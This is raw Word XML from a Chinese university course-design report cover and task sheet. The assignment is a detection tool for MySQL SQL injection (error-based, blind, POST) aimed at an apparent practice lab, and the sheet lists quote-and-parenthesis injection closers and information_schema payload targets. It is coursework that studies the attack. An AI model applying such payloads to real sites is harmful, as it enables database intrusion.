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44C5" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57">
      <w:pPr>
        <w:spacing w:after="730" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="878"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="404F9652" wp14:editId="484696D7">
            <wp:extent cx="4537075" cy="9709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1A26" w14:textId="77777777" w:rsidR="009244CA" w:rsidRDefault="003E1C57" w:rsidP="003E015B">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:after="1252" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="2798" w:firstLine="0"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc104974575"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>课程设计小组报告</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="629C02D0" w14:textId="77777777" w:rsidR="009244CA" w:rsidRPr="003E015B" w:rsidRDefault="003E1C57" w:rsidP="00A17B8C">
      <w:pPr>
        <w:spacing w:after="825" w:line="500" w:lineRule="exact"/>
        <w:ind w:left="955"/>
      </w:pPr>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>课程名称：</w:t>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>网络攻击与防御课程设计</w:t>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1624CBB1" w14:textId="77777777" w:rsidR="009244CA" w:rsidRPr="003E015B" w:rsidRDefault="003E1C57" w:rsidP="00A17B8C">
      <w:pPr>
        <w:spacing w:after="837" w:line="500" w:lineRule="exact"/>
        <w:ind w:left="960"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>设计名称：</w:t>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Calibri"/>
          <w:sz w:val="32"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">注入漏洞检测系统的设计 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA70EE2" w14:textId="77777777" w:rsidR="009244CA" w:rsidRPr="003E015B" w:rsidRDefault="003E1C57" w:rsidP="00A17B8C">
      <w:pPr>
        <w:spacing w:after="792" w:line="500" w:lineRule="exact"/>
        <w:ind w:left="955"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>专业班级：</w:t>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>信息安全</w:t>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Calibri"/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>1901</w:t>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">班 </w:t>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF2B5D0" w14:textId="77777777" w:rsidR="009244CA" w:rsidRPr="003E015B" w:rsidRDefault="003E1C57" w:rsidP="00A17B8C">
      <w:pPr>
        <w:spacing w:after="792" w:line="500" w:lineRule="exact"/>
        <w:ind w:left="955"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>组长：</w:t>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">秦赛灯 </w:t>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D35D1DE" w14:textId="77777777" w:rsidR="009244CA" w:rsidRPr="003E015B" w:rsidRDefault="003E1C57" w:rsidP="00A17B8C">
      <w:pPr>
        <w:spacing w:after="792" w:line="500" w:lineRule="exact"/>
        <w:ind w:left="955"/>
      </w:pPr>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>小组成员：</w:t>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>蒋卓樾</w:t>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>赵雪</w:t>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>唐思源</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5F43DB" w14:textId="04642C6E" w:rsidR="003E015B" w:rsidRPr="003E015B" w:rsidRDefault="003E1C57" w:rsidP="00A17B8C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="1759"/>
          <w:tab w:val="center" w:pos="4320"/>
        </w:tabs>
        <w:spacing w:after="1467" w:line="500" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>指导教师：</w:t>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>兰方鹏</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="003E015B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="38011850" w14:textId="04348866" w:rsidR="005807BE" w:rsidRPr="00A17B8C" w:rsidRDefault="003E1C57" w:rsidP="00A17B8C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="1759"/>
          <w:tab w:val="center" w:pos="4320"/>
        </w:tabs>
        <w:spacing w:after="1467" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A17B8C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2022</w:t>
      </w:r>
      <w:r w:rsidRPr="00A17B8C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r w:rsidRPr="00A17B8C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00A17B8C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r w:rsidRPr="00A17B8C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r w:rsidRPr="00A17B8C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0E96FF" w14:textId="77777777" w:rsidR="005807BE" w:rsidRDefault="005807BE" w:rsidP="005807BE">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:after="0"/>
        <w:ind w:right="502"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>太原理工大学课程设计任务书</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8797" w:type="dxa"/>
        <w:tblInd w:w="-109" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="173" w:type="dxa"/>
          <w:right w:w="171" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1466"/>
        <w:gridCol w:w="2931"/>
        <w:gridCol w:w="1466"/>
        <w:gridCol w:w="1467"/>
        <w:gridCol w:w="1467"/>
      </w:tblGrid>
      <w:tr w:rsidR="005807BE" w14:paraId="5A3CBA3F" w14:textId="77777777" w:rsidTr="004B482A">
        <w:trPr>
          <w:trHeight w:val="63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8316" w14:textId="77777777" w:rsidR="005807BE" w:rsidRDefault="005807BE" w:rsidP="004B482A">
            <w:pPr>
              <w:spacing w:line="256" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>学生姓名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C3A7" w14:textId="771E8E2B" w:rsidR="005807BE" w:rsidRPr="00671285" w:rsidRDefault="005807BE" w:rsidP="00671285">
            <w:pPr>
              <w:spacing w:after="160" w:line="256" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00671285">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>秦赛灯</w:t>
            </w:r>
            <w:r w:rsidRPr="00671285">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00671285">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>蒋卓樾</w:t>
            </w:r>
            <w:r w:rsidRPr="00671285">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00671285">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>赵雪</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FC69D49" w14:textId="77777777" w:rsidR="005807BE" w:rsidRDefault="005807BE" w:rsidP="00671285">
            <w:pPr>
              <w:spacing w:after="160" w:line="256" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00671285">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>唐思源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B529" w14:textId="77777777" w:rsidR="005807BE" w:rsidRDefault="005807BE" w:rsidP="004B482A">
            <w:pPr>
              <w:spacing w:line="256" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>专业班级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D636" w14:textId="77777777" w:rsidR="005807BE" w:rsidRDefault="005807BE" w:rsidP="004B482A">
            <w:pPr>
              <w:spacing w:line="256" w:lineRule="auto"/>
              <w:ind w:left="135"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>信息安全工程</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>1901</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005807BE" w14:paraId="76CC2E15" w14:textId="77777777" w:rsidTr="004B482A">
        <w:trPr>
          <w:trHeight w:val="63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DA8D" w14:textId="77777777" w:rsidR="005807BE" w:rsidRDefault="005807BE" w:rsidP="004B482A">
            <w:pPr>
              <w:spacing w:line="256" w:lineRule="auto"/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7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40FE" w14:textId="77777777" w:rsidR="005807BE" w:rsidRDefault="005807BE" w:rsidP="004B482A">
            <w:pPr>
              <w:spacing w:line="256" w:lineRule="auto"/>
              <w:ind w:right="4"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>网络攻击与防御课程设计</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005807BE" w14:paraId="447A6819" w14:textId="77777777" w:rsidTr="004B482A">
        <w:trPr>
          <w:trHeight w:val="63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C55B" w14:textId="77777777" w:rsidR="005807BE" w:rsidRDefault="005807BE" w:rsidP="004B482A">
            <w:pPr>
              <w:spacing w:line="256" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>设计名称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F2ED" w14:textId="77777777" w:rsidR="005807BE" w:rsidRDefault="005807BE" w:rsidP="004B482A">
            <w:pPr>
              <w:spacing w:line="256" w:lineRule="auto"/>
              <w:ind w:left="233"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>注入漏洞检测系统的设计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30C8" w14:textId="77777777" w:rsidR="005807BE" w:rsidRDefault="005807BE" w:rsidP="004B482A">
            <w:pPr>
              <w:spacing w:line="256" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>设计周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5BD3" w14:textId="77777777" w:rsidR="005807BE" w:rsidRDefault="005807BE" w:rsidP="004B482A">
            <w:pPr>
              <w:spacing w:line="256" w:lineRule="auto"/>
              <w:ind w:right="2"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>周</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005807BE" w14:paraId="155F0C1B" w14:textId="77777777" w:rsidTr="00671285">
        <w:trPr>
          <w:trHeight w:val="2734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54A2" w14:textId="77777777" w:rsidR="005807BE" w:rsidRDefault="005807BE" w:rsidP="004B482A">
            <w:pPr>
              <w:spacing w:line="256" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>设计任务主要设计参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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E219" w14:textId="6A40FCE2" w:rsidR="00671285" w:rsidRPr="00671285" w:rsidRDefault="00671285" w:rsidP="0067128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设计任务：设计一个基于 MYSQL 数据库系统的 SQL 注入漏洞检测程序或者脚本， 能够检测报错注入、</w:t>
            </w:r>
            <w:proofErr w:type="gram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盲注和</w:t>
            </w:r>
            <w:proofErr w:type="gram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 POST 注入。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="060B8A9F" w14:textId="0E775118" w:rsidR="00671285" w:rsidRPr="00671285" w:rsidRDefault="00671285" w:rsidP="0067128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主要设计参数：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03D1B54E" w14:textId="77777777" w:rsidR="00671285" w:rsidRPr="00671285" w:rsidRDefault="00671285" w:rsidP="0067128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URL：http://xxx/Less-x.php/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F252603" w14:textId="77777777" w:rsidR="00671285" w:rsidRPr="00671285" w:rsidRDefault="00671285" w:rsidP="0067128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注入类型：报错、盲注、post</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F300F2A" w14:textId="77777777" w:rsidR="00671285" w:rsidRPr="00671285" w:rsidRDefault="00671285" w:rsidP="0067128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注入符号：’、</w:t>
            </w:r>
            <w:proofErr w:type="gram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”</w:t>
            </w:r>
            <w:proofErr w:type="gram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、</w:t>
            </w:r>
            <w:proofErr w:type="gram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’</w:t>
            </w:r>
            <w:proofErr w:type="gram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)、</w:t>
            </w:r>
            <w:proofErr w:type="gram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”</w:t>
            </w:r>
            <w:proofErr w:type="gram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)、</w:t>
            </w:r>
            <w:proofErr w:type="gram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’</w:t>
            </w:r>
            <w:proofErr w:type="gram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))、</w:t>
            </w:r>
            <w:proofErr w:type="gram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”</w:t>
            </w:r>
            <w:proofErr w:type="gram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))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FD3A49E" w14:textId="21C2A270" w:rsidR="005807BE" w:rsidRPr="00671285" w:rsidRDefault="00671285" w:rsidP="0067128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proofErr w:type="spell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Payload:database</w:t>
            </w:r>
            <w:proofErr w:type="spell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()、</w:t>
            </w:r>
            <w:proofErr w:type="spell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information_schame.tables</w:t>
            </w:r>
            <w:proofErr w:type="spell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、</w:t>
            </w:r>
            <w:proofErr w:type="spell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information_schame.columns</w:t>
            </w:r>
            <w:proofErr w:type="spell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、</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005807BE" w14:paraId="08244D89" w14:textId="77777777" w:rsidTr="004B482A">
        <w:trPr>
          <w:trHeight w:val="1778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1EF4" w14:textId="77777777" w:rsidR="005807BE" w:rsidRDefault="005807BE" w:rsidP="004B482A">
            <w:pPr>
              <w:spacing w:line="256" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>设计内容设计要求</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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6ADA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设计一个基于 </w:t>
            </w:r>
            <w:r w:rsidRPr="00671285">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">MYSQL </w:t>
            </w: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数据库系统的 </w:t>
            </w:r>
            <w:r w:rsidRPr="00671285">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">SQL </w:t>
            </w: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注入漏洞检测程序或者脚本，能够检测报错注入、</w:t>
            </w:r>
            <w:proofErr w:type="gramStart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盲注和</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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671285">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
